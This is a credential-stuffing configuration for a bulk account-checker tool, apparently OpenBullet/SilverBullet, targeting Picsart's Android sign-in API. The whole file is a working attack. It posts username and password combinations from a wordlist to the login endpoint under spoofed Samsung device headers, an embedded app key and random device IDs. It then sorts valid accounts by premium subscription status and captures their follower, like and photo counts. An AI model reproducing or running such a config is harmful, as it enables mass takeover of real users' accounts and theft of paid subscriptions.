[SETTINGS]
{
  "Name": "Picsart.com Android [ZsoZso]",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-05-19T22:03:57.4949595+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "ZsoZso",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Pics",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h??h?h?h?h" -> VAR "rayid1" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h??h?h?h?h" -> VAR "rayid2" 

FUNCTION RandomString "?h?h?h?h?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h-?h?h?h?h?h?h?h??h?h?h?h" -> VAR "did" 

REQUEST POST "https://api.picsart.com/users/signin.json" 
  CONTENT "{\"provider\":\"\",\"username\":\"<USER>\",\"password\":\"<PASS>\",\"appsflyer_id\":\"1652940453306-531448222636619095\",\"fcm_token\":\"dWsKkGwGQ7--HydnCuQuTn:APA91bEhUsReZBfLx8I21S1gcYxouK-Ovqf6Qbs1TfOLfSA_QRi6nNM2qjDRZ22RYXEysiTiIgAmtIDeahf29Uq7E1GW-H6s09NU9CmIe-6EPK_TfcyYqm2yq-BwTWHeG4q__bwbO1zw\"}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "accept: application/picsart-3.0+json" 
  HEADER "accept-encoding: br,gzip" 
  HEADER "apk-key: 7266486dce4251fb48a8ff5fa35ddcaa" 
  HEADER "app: com.picsart.studio" 
  HEADER "auto-briteverify-token: connection: Keep-Alive" 
  HEADER "content-length: " 
  HEADER "country-code: DE" 
  HEADER "device-model: SM-G988N" 
  HEADER "deviceid: <did>" 
  HEADER "experiments: rhi7:original" 
  HEADER "host: api.picsart.com" 
  HEADER "is-tablet: 0" 
  HEADER "language-code: de" 
  HEADER "low-memory: 0" 
  HEADER "manufacturer: samsung" 
  HEADER "market: google" 
  HEADER "network: WIFI" 
  HEADER "os-version: 7.1.2" 
  HEADER "platform: android" 
  HEADER "ray-id: <rayid2>, <rayid1>" 
  HEADER "user-agent: PicsArt-10.x" 
  HEADER "versioncode: 993819708" 
  HEADER "x-api-key: " 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "username_or_password_incorrect" 
  KEYCHAIN Success OR 
    KEY "is_trial_used\":true" 
    KEY "\"granted\":true" 
    KEY "subscribed" 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "is_trial_used\":false" 
    KEY "\"granted\":false" 
    KEY "<SOURCE>" DoesNotContain "subscribed" 

PARSE "<SOURCE>" LR "granted\":" "},\"has_user" CreateEmpty=FALSE -> CAP "IsPremium" 

PARSE "<SOURCE>" LR "followers_count\":" ",\"streams_c" CreateEmpty=FALSE -> CAP "Followers" 

PARSE "<SOURCE>" LR "\"likes_count\":" ",\"photos_count" CreateEmpty=FALSE -> CAP "Likes" 

PARSE "<SOURCE>" LR "\"photos_count\":" ",\"stickers_count" CreateEmpty=FALSE -> CAP "Photos" 

FUNCTION Constant "Config by ZsoZso" -> CAP "Credit" 

